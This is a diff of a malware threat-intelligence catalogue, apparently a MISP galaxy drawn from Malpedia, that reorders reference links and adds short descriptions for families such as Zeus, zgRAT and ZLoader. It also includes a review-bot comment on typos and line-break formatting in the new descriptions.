+ "https://mp.weixin.qq.com/s/pE_6VRDk-2aTI996sff0og"
 ],
 "synonyms": [
 "Zekapab"
@@ -51736,20 +54257,20 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeppelin",
- "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://blog.sekoia.io/vice-society-a-discreet-but-steady-double-extortion-ransomware-group/",
- "https://community.riskiq.com/article/47766fbd",
- "https://threatvector.cylance.com/en_us/home/zeppelin-russian-ransomware-targets-high-profile-users-in-the-us-and-europe.html",
 "https://storage.pardot.com/272312/124918/Flashpoint_Hunt_Team___Zeppelin_Ransomware_Analysis.pdf",
+ "https://www.gdatasoftware.com/blog/2020/06/35946-burans-transformation-into-zeppelin",
+ "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
+ "https://blog.sekoia.io/vice-society-a-discreet-but-steady-double-extortion-ransomware-group/",
 "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
 "https://www.intrinsec.com/vice-society-spreads-its-own-ransomware/",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
+ "https://threatvector.cylance.com/en_us/home/zeppelin-russian-ransomware-targets-high-profile-users-in-the-us-and-europe.html",
+ "https://community.riskiq.com/article/47766fbd",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
 "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-223A_Zeppelin_CSA.pdf",
 "https://www.cisa.gov/uscert/ncas/alerts/aa22-249a",
- "https://www.gdatasoftware.com/blog/2020/06/35946-burans-transformation-into-zeppelin",
 "https://www.cisa.gov/uscert/ncas/alerts/aa22-223a",
 "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
 "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618"
 ],
 "synonyms": [],
@@ -51763,16 +54284,16 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroaccess",
- "https://blog.malwarebytes.com/threat-analysis/2013/08/sophos-discovers-zeroaccess-using-rlo/",
- "http://resources.infosecinstitute.com/step-by-step-tutorial-on-reverse-engineering-malware-the-zeroaccessmaxsmiscer-crimeware-rootkit/",
- "http://contagiodump.blogspot.com/2012/12/zeroaccess-sirefef-rootkit-5-fresh.html",
- "http://resources.infosecinstitute.com/zeroaccess-malware-part-3-the-device-driver-process-injection-rootkit/",
 "https://www.researchgate.net/profile/Lorenzo-De-Carli/publication/320250366_Botnet_protocol_inference_in_the_presence_of_encrypted_traffic/links/5fa9608792851cc286a08592/Botnet-protocol-inference-in-the-presence-of-encrypted-traffic.pdf?origin=publication_detail",
- "http://resources.infosecinstitute.com/zeroaccess-malware-part-4-tracing-the-crimeware-origins-by-reversing-injected-code/",
- "https://blog.malwarebytes.com/threat-analysis/2013/07/zeroaccess-anti-debug-uses-debugger/",
- "http://contagiodump.blogspot.com/2010/11/zeroaccess-max-smiscer-crimeware.html",
+ "http://contagiodump.blogspot.com/2012/12/zeroaccess-sirefef-rootkit-5-fresh.html",
 "http://resources.infosecinstitute.com/zeroaccess-malware-part-2-the-kernel-mode-device-driver-stealth-rootkit/",
- "https://www.virusbulletin.com/virusbulletin/2016/01/paper-notes-click-fraud-american-story/"
+ "https://www.virusbulletin.com/virusbulletin/2016/01/paper-notes-click-fraud-american-story/",
+ "http://resources.infosecinstitute.com/zeroaccess-malware-part-4-tracing-the-crimeware-origins-by-reversing-injected-code/",
+ "https://blog.malwarebytes.com/threat-analysis/2013/08/sophos-discovers-zeroaccess-using-rlo/",
+ "http://contagiodump.blogspot.com/2010/11/zeroaccess-max-smiscer-crimeware.html",
+ "http://resources.infosecinstitute.com/zeroaccess-malware-part-3-the-device-driver-process-injection-rootkit/",
+ "http://resources.infosecinstitute.com/step-by-step-tutorial-on-reverse-engineering-malware-the-zeroaccessmaxsmiscer-crimeware-rootkit/",
+ "https://blog.malwarebytes.com/threat-analysis/2013/07/zeroaccess-anti-debug-uses-debugger/"
 ],
 "synonyms": [
 "Max++",
@@ -51789,13 +54310,13 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.zerocleare",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://www.microsoft.com/security/blog/2022/09/08/microsoft-investigates-iranian-attacks-against-the-albanian-government",
 "https://www.ibm.com/downloads/cas/OAJ4VZNJ",
- "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/",
- "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
+ "https://www.microsoft.com/security/blog/2022/09/08/microsoft-investigates-iranian-attacks-against-the-albanian-government",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
 "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf"
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/"
 ],
 "synonyms": [],
 "type": []
@@ -51858,50 +54379,51 @@
 "value": "ZeroT"
 },
 {
- "description": "",
+ "description": "According to CrowdStrike, The two primary goals of the Zeus trojan horse virus are stealing people's financial information and adding machines to a botnet. Unlike many types of malware, most Zeus variants try to avoid doing long-term damage to the devices they infect. Their aim is to avoid detection from antivirus software.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus",
- "https://www.youtube.com/watch?v=LUxOcpIRxmg",
- "http://contagiodump.blogspot.com/2010/07/zeus-version-scheme-by-trojan-author.html",
 "https://www.secureworks.com/research/threat-profiles/bronze-woodland",
- "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022",
- "https://www.justice.gov/opa/pr/four-individuals-plead-guilty-rico-conspiracy-involving-bulletproof-hosting-cybercriminals",
+ "https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/",
 "http://eternal-todo.com/blog/detecting-zeus",
- "https://www.s21sec.com/en/zeus-the-missing-link/",
- "https://www.wired.com/2017/03/russian-hacker-spy-botnet/",
- "https://www.secureworks.com/research/zeus?threat=zeus",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf",
- "https://www.kryptoslogic.com/blog/2021/07/trickbot-and-zeus/",
- "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/zeus_king_of_bots.pdf",
- "http://malwareint.blogspot.com/2010/01/leveraging-zeus-to-send-spam-through.html",
- "http://malwareint.blogspot.com/2010/02/zeus-on-irs-scam-remains-actively.html",
- "https://www.mnin.org/write/ZeusMalware.pdf",
- "http://contagiodump.blogspot.com/2010/07/zeus-trojan-research-links.html",
- "https://unit42.paloaltonetworks.com/banking-trojan-techniques/",
- "http://malwareint.blogspot.com/2010/03/new-phishing-campaign-against-facebook.html",
- "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html",
 "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
+ "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group",
+ "https://www.mnin.org/write/ZeusMalware.pdf",
 "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
- "http://malwareint.blogspot.com/2009/07/special-zeus-botnet-for-dummies.html",
- "https://nakedsecurity.sophos.com/2010/07/24/sample-run/",
- "https://www.symantec.com/connect/blogs/spyeye-s-kill-zeus-bark-worse-its-bite",
- "https://blog.malwarebytes.com/101/2021/07/the-life-and-death-of-the-zeus-trojan/",
- "http://malwareint.blogspot.com/2010/02/facebook-phishing-campaign-proposed-by.html",
- "http://eternal-todo.com/blog/zeus-spreading-facebook",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf",
+ "http://contagiodump.blogspot.com/2010/07/zeus-version-scheme-by-trojan-author.html",
 "http://www.secureworks.com/research/threat-profiles/gold-evergreen",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
- "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf",
- "http://eternal-todo.com/blog/new-zeus-binary",
+ "https://www.symantec.com/connect/blogs/spyeye-s-kill-zeus-bark-worse-its-bite",
+ "https://nakedsecurity.sophos.com/2010/07/24/sample-run/",
+ "http://malwareint.blogspot.com/2010/03/new-phishing-campaign-against-facebook.html",
+ "https://blog.malwarebytes.com/101/2021/07/the-life-and-death-of-the-zeus-trojan/",
+ "http://malwareint.blogspot.com/2010/01/leveraging-zeus-to-send-spam-through.html",
+ "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/zeus_king_of_bots.pdf",
+ "https://www.youtube.com/watch?v=LUxOcpIRxmg",
+ "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html",
 "https://www.symantec.com/connect/blogs/brief-look-zeuszbot-20",
- "https://www.secureworks.com/research/threat-profiles/gold-evergreen",
- "https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/",
- "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group",
+ "http://eternal-todo.com/blog/new-zeus-binary",
+ "http://malwareint.blogspot.com/2009/07/special-zeus-botnet-for-dummies.html",
+ "http://eternal-todo.com/blog/zeus-spreading-facebook",
 "https://securelist.com/financial-cyberthreats-in-2020/101638/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "http://contagiodump.blogspot.com/2010/07/zeus-trojan-research-links.html",
+ "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf",
 "https://www.anomali.com/files/white-papers/russian-federation-country-profile.pdf",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf"
+ "https://www.crowdstrike.com/cybersecurity-101/malware/trojan-zeus-malware",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://www.s21sec.com/en/zeus-the-missing-link/",
+ "https://www.kryptoslogic.com/blog/2021/07/trickbot-and-zeus/",
+ "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022",
+ "https://www.secureworks.com/research/zeus?threat=zeus",
+ "http://malwareint.blogspot.com/2010/02/facebook-phishing-campaign-proposed-by.html",
+ "https://www.wired.com/2017/03/russian-hacker-spy-botnet/",
+ "https://www.justice.gov/opa/pr/four-individuals-plead-guilty-rico-conspiracy-involving-bulletproof-hosting-cybercriminals",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
+ "https://www.secureworks.com/research/threat-profiles/gold-evergreen",
+ "https://unit42.paloaltonetworks.com/banking-trojan-techniques/",
+ "http://malwareint.blogspot.com/2010/02/zeus-on-irs-scam-remains-actively.html"
 ],
 "synonyms": [
 "Zbot"
@@ -51942,9 +54464,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_openssl",
- "https://securityintelligence.com/posts/zeus-sphinx-trojan-awakens-amidst-coronavirus-spam-frenzy/",
 "https://securityintelligence.com/brazil-cant-catch-a-break-after-panda-comes-the-sphinx/",
- "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/"
+ "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/",
+ "https://securityintelligence.com/posts/zeus-sphinx-trojan-awakens-amidst-coronavirus-spam-frenzy/"
 ],
 "synonyms": [
 "XSphinx"
@@ -51959,9 +54481,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_sphinx",
- "https://web.archive.org/web/20160130165709/http://darkmatters.norsecorp.com/2015/08/24/sphinx-new-zeus-variant-for-sale-on-the-black-market/",
 "https://securityintelligence.com/posts/zeus-sphinx-back-in-business-some-core-modifications-arise/",
- "https://securityaffairs.co/wordpress/39592/cyber-crime/sphinx-variant-zeus-trojan.html"
+ "https://securityaffairs.co/wordpress/39592/cyber-crime/sphinx-variant-zeus-trojan.html",
+ "https://web.archive.org/web/20160130165709/http://darkmatters.norsecorp.com/2015/08/24/sphinx-new-zeus-variant-for-sale-on-the-black-market/"
 ],
 "synonyms": [],
 "type": []
@@ -51983,10 +54505,13 @@
 "value": "Zezin"
 },
 {
- "description": "",
+ "description": "zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.\r\nUsually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat",
+ "https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/",
+ "https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US",
+ "https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities",
 "https://bazaar.abuse.ch/browse/signature/zgRAT/"
 ],
 "synonyms": [],
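Review bot: The new zgRAT description carries a typo, `inforstealer`, and its attachment list `-zip/-lnk/.bat/.xlsx` mixes a hyphen and a dot as the extension prefix, which reads as a transcription slip; if the text is quoted verbatim from the upstream source it should say so (the other new descriptions open with "According to …"), otherwise correct it to `infostealer` and `.zip/.lnk/.bat/.xlsx`. The description also embeds a literal `\r\n` line break, as the new Zebrocy description does, while the YTStealer and Yasso descriptions use none; consumers that render the field raw will show the CRLF, so one consistent convention (a plain space or `\n`) across the file would be preferable.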
@@ -52072,88 +54597,88 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.zloader",
- "https://blag.nullteilerfrei.de/2020/06/11/api-hashing-in-the-zloader-malware/",
- "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
- "https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/",
- "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/",
- "https://info.phishlabs.com/blog/surge-in-zloader-attacks-observed",
 "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
- "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/",
- "https://blag.nullteilerfrei.de/2020/05/24/zloader-string-obfuscation/",
- "https://blogs.microsoft.com/on-the-issues/2022/04/13/zloader-botnet-disrupted-malware-ukraine/",
- "https://insight-jp.nttsecurity.com/post/102gsqj/pseudogatespelevo-exploit-kit",
- "https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/",
- "https://www.forcepoint.com/blog/security-labs/zeus-delivered-deloader-defraud-customers-canadian-banks",
- "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/",
- "https://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/",
- "https://www.sentinelone.com/labs/hide-and-seek-new-zloader-infection-chain-comes-with-improved-stealth-and-evasion-mechanisms/",
- "https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/",
- "https://noticeofpleadings.com/zloader/",
- "https://labs.k7computing.com/?p=22458",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://blogs.quickheal.com/zloader-entailing-different-office-files/",
- "https://documents.trendmicro.com/assets/txt/IOCs-zloader-campaigns-at-a-glance.txt",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
- "https://www.cybereason.com/blog/threat-analysis-report-socgholish-and-zloader-from-fake-updates-and-installers-to-owning-your-systems",
- "https://int0xcc.svbtle.com/dissecting-obfuscated-deloader-malware",
- "https://www.hornetsecurity.com/en/threat-research/zloader-email-campaign-using-mhtml-to-download-and-decrypt-xls/",
- "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
- "https://cybleinc.com/2021/04/19/zloader-returns-through-spelevo-exploit-kit-phishing-campaign/",
- "https://securityintelligence.com/around-the-world-with-zeus-sphinx-from-canada-to-australia-and-back/",
- "https://clickallthethings.wordpress.com/2020/06/19/zloader-vba-r1c1-references-and-other-tomfoolery/",
- "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-strrat-zloader-honeygain",
 "https://www.forcepoint.com/blog/x-labs/invoicing-spam-campaigns-malware-zloader",
- "https://blog.alyac.co.kr/3322",
- "https://blog.vincss.net/2022/04/re026-a-deep-dive-into-zloader-the-silent-night.html",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/zloader-campaigns-at-a-glance",
+ "https://blog.malwarebytes.com/threat-analysis/2020/11/malsmoke-operators-abandon-exploit-kits-in-favor-of-social-engineering-scheme/",
+ "https://blag.nullteilerfrei.de/2020/05/24/zloader-string-obfuscation/",
+ "https://www.welivesecurity.com/2022/04/13/eset-takes-part-global-operation-disrupt-zloader-botnets/",
+ "https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
 "https://clickallthethings.wordpress.com/2020/09/21/zloader-xlm-update-macro-code-and-behavior-change/",
 "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
- "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html",
 "https://securityliterate.com/chantays-resume-investigating-a-cv-themed-zloader-malware-campaign/",
- "https://www.crowdstrike.com/blog/falcon-overwatch-uncovers-ongoing-night-spider-zloader-campaign/",
- "https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/",
- "https://www.proofpoint.com/us/blog/threat-insight/zloader-loads-again-new-zloader-variant-returns",
- "https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries",
- "https://twitter.com/VK_Intel/status/1294320579311435776",
- "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf",
+ "https://documents.trendmicro.com/assets/txt/IOCs-zloader-campaigns-at-a-glance.txt",
+ "https://labs.k7computing.com/?p=22458",
+ "https://noticeofpleadings.com/zloader/",
+ "https://www.hornetsecurity.com/en/threat-research/zloader-email-campaign-using-mhtml-to-download-and-decrypt-xls/",
+ "https://www.cybereason.com/blog/threat-analysis-report-socgholish-and-zloader-from-fake-updates-and-installers-to-owning-your-systems",
+ "https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/zloader-campaigns-at-a-glance",
+ "https://web.archive.org/web/20200929145931/https://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/",
+ "https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/",
+ "https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/",
+ "https://decoded.avast.io/vladimirmartyanov/zloader-the-silent-night/",
+ "https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/",
+ "https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
 "https://securityintelligence.com/zeus-sphinx-pushes-empty-configuration-files-what-has-the-sphinx-got-cooking/",
+ "https://blog.vincss.net/2022/04/re026-a-deep-dive-into-zloader-the-silent-night.html",
+ "https://twitter.com/VK_Intel/status/1294320579311435776",
+ "https://www.youtube.com/watch?v=QBoj6GB79wM",
+ "https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/",
+ "https://insight-jp.nttsecurity.com/post/102gsqj/pseudogatespelevo-exploit-kit",
+ "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
+ "https://www.bleepingcomputer.com/news/security/banking-malware-spreading-via-covid-19-relief-payment-phishing/",
+ "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/",
 "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf",
 "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/",
- "https://www.youtube.com/watch?v=QBoj6GB79wM",
+ "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/",
+ "https://securityintelligence.com/posts/zeus-sphinx-trojan-awakens-amidst-coronavirus-spam-frenzy/",
+ "https://securityintelligence.com/around-the-world-with-zeus-sphinx-from-canada-to-australia-and-back/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
 "https://twitter.com/ffforward/status/1324281530026524672",
- "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/",
- "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf",
- "https://www.fortinet.com/blog/threat-research/the-curious-case-of-an-unknown-trojan-targeting-german-speaking-users.html",
- "https://www.welivesecurity.com/2022/04/13/eset-takes-part-global-operation-disrupt-zloader-botnets/",
- "https://unit42.paloaltonetworks.com/api-hammering-malware-families/",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489",
- "https://decoded.avast.io/vladimirmartyanov/zloader-the-silent-night/",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/",
- "https://johannesbader.ch/blog/the-dga-of-zloader/",
- "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
 "https://aaqeel01.wordpress.com/2021/10/18/zloader-reversing/",
+ "https://www.forcepoint.com/blog/security-labs/zeus-delivered-deloader-defraud-customers-canadian-banks",
+ "https://blogs.microsoft.com/on-the-issues/2022/04/13/zloader-botnet-disrupted-malware-ukraine/",
+ "https://www.sentinelone.com/labs/hide-and-seek-new-zloader-infection-chain-comes-with-improved-stealth-and-evasion-mechanisms/",
+ "https://info.phishlabs.com/blog/zloader-dominates-email-payloads-in-q1",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://johannesbader.ch/blog/the-dga-of-zloader/",
+ "https://clickallthethings.wordpress.com/2020/06/19/zloader-vba-r1c1-references-and-other-tomfoolery/",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html",
+ "https://www.proofpoint.com/us/blog/threat-insight/zloader-loads-again-new-zloader-variant-returns",
+ "https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
 "https://www.youtube.com/watch?v=mhX-UoaYnOM",
+ "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-strrat-zloader-honeygain",
+ "https://cybleinc.com/2021/04/19/zloader-returns-through-spelevo-exploit-kit-phishing-campaign/",
+ "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf",
+ "https://www.fortinet.com/blog/threat-research/the-curious-case-of-an-unknown-trojan-targeting-german-speaking-users.html",
+ "https://info.phishlabs.com/blog/surge-in-zloader-attacks-observed",
+ "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/",
+ "https://int0xcc.svbtle.com/dissecting-obfuscated-deloader-malware",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
+ "https://blog.alyac.co.kr/3322",
+ "https://www.crowdstrike.com/blog/falcon-overwatch-uncovers-ongoing-night-spider-zloader-campaign/",
+ "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/",
+ "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf",
+ "https://unit42.paloaltonetworks.com/api-hammering-malware-families/",
+ "https://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/",
 "https://www.lac.co.jp/lacwatch/people/20201106_002321.html",
 "https://resources.malwarebytes.com/files/2020/05/The-Silent-Night-Zloader-Zbot_Final.pdf",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://blog.malwarebytes.com/threat-analysis/2020/11/malsmoke-operators-abandon-exploit-kits-in-favor-of-social-engineering-scheme/",
- "https://securityintelligence.com/posts/zeus-sphinx-trojan-awakens-amidst-coronavirus-spam-frenzy/",
- "https://www.bleepingcomputer.com/news/security/banking-malware-spreading-via-covid-19-relief-payment-phishing/",
- "https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/",
- "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://web.archive.org/web/20200929145931/https://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/",
- "https://info.phishlabs.com/blog/zloader-dominates-email-payloads-in-q1",
- "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex"
+ "https://blag.nullteilerfrei.de/2020/06/11/api-hashing-in-the-zloader-malware/",
+ "https://blogs.quickheal.com/zloader-entailing-different-office-files/",
+ "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
+ "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/",
+ "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf",
+ "https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries"
 ],
 "synonyms": [
 "DELoader",
@@ -52199,8 +54724,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.zumanek",
- "https://www.welivesecurity.com/br/2018/01/17/zumanek-malware-tenta-roubar-credenciais-de-servicos/",
